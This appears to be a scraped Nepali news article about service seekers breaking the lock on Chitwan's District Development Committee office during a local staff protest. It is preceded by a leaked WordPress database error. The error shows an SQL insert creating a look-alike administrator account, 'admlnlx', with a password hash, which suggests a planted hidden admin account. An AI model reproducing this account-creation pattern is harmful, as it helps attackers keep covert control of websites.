WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B21RFyiUmAwdFMx4LSRwng8sR5bEjW1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 01:33:10', '', 'admlnlx', 'admlnlx')
सविता अधिकारी,
चितवन, फागुन ५–
स्थानीय निकायका कर्मचारीको आन्दोलनका कारण पूर्णरुपमा बन्द भएको चितवनको जिल्ला विकास समितिको कार्यालयमा लगाईएको ताला सोवाग्राहीले खोलेका छन् । आज दिउँसो कार्यालय पुगेका सेवाग्राहीहरुले आफूहरुको काम हुनुपर्ने भन्दै जिविसको ढोकामा लगाइएको ताला फोडेका थिए ।
जिविस र नगरपालिका बन्द हुँदा अहिले दैनिक विभिन्न सरकारी कामको सेवा लिन जाने सोवाग्राही जनता भने सम्बन्धित कार्यालयमा पुगेर रित्तै फर्कनु परेपछि उनीहरुले आफैले ताला फोडेका हुन् । सेवाग्राहीले ताला फोडे पनि कर्मचारीहरु भने कार्यलय बाहिर नै बसीरहेको र आफ्नो माग पुरा नभए सम्म प्रशासनिक सेवा प्रदान नगर्ने स्थानिय कर्मचारी प्रकाश पौडेलले नारायणी अनलाईनलाई बताए । स्थानीय विकास अधिकारी कृष्णप्रसाद सुवेदिका अनुसार स्थानिय कर्मचारीका मागका बारेमा केन्द्रमा वर्ता भईरहेको र छिट्टै समाधान हुनेछ । विभिन्न माग राख्दै स्थानीय निकायका कमर्चारीहरु आन्दोलित भएका छन् ।